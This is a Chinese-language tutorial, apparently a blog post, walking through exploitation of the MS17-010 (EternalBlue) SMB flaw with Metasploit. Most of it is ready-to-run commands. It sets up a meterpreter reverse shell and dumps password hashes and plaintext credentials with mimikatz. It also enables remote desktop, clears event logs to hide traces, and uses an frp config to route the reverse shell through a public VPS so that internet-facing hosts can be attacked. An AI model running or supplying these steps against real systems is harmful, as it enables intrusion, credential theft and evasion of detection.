一.先用Router Scan 掃描
看清楚了網絡拓撲結構。
二.使用MS17-010批量掃描工具
下載:ms17-010Scan.exe (也可以用kali自帶的nmap和ms17-10模塊掃)
三.漏洞利用
kali 終端輸入
msfconsole
search ms17-010 要是搜不到,請更新你的msf
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.66 設置目標機ip
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.104 設置本機監聽ip ,默認LPORT端口為4444 同一個C段才算同一個局域網。不在的話,就會很麻煩(kali 是在虛擬機的話,改為橋接)
exploit 開始執行漏洞利用模塊
當出現meterpreter> 說明利用成功
在實驗室,五台環境配置相同的機子(ps:都開啟防火牆和騰訊安全管家)只成功了一台。其他的總是出現無法連接上445端口。也百度不到答案
四.遠程登錄目標機
meterpreter>migrate 616 關閉對方防火牆
meterpreter>screenshot 截屏
meterpreter>hashdump 獲取目標機hash值
meterpreter>load mimikatz 啟動mimikatz
meterpreter>msv 導出hash值
meterpreter>kerberos 獲得目標機的賬號密碼(要是空密碼,就要自己創建一個用戶,不過會被安全軟件攔截)
另開一個終端(!!!!!!!!!!是另開一個!!!!!!!!)
rdesktop 192.168.1.66 -u 賬號 -p 密碼
要是連不上就要開3389
meterpreter > run getgui -e 開3389命令,然后再執行上一條命令
meterpreter >clearev 擦除痕跡再跑路
五.內網打外網(2018/6/12更新)
首先把自己的端口轉發出去,可以用路由器。博主是用frpc。
環境:操作機內網192.168.1.1 目標機外網 222.222.222.222 一台公網vps 111.111.111.111
frpc.ini
[common]
server_addr = 111.111.111.111
server_port = 1024
[RAT]
type = tcp
local_ip = 192.168.1.1
local_port = 4444
remote_port = 7002
auth_token = 123
//把192.168.1.1:4444轉發到111.111.111.111:7002
運行代理
root@kali:~/Desktop/frp/frp_0.17.0_linux_amd64# ./frpc
第一個msf攻擊
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 222.222.222.222 設置目標機ip
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 111.111.111.111 vps的ip
set LPORT 7002 轉發到vps的端口
exploit
另開一個msf監聽
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(multi/handler) > run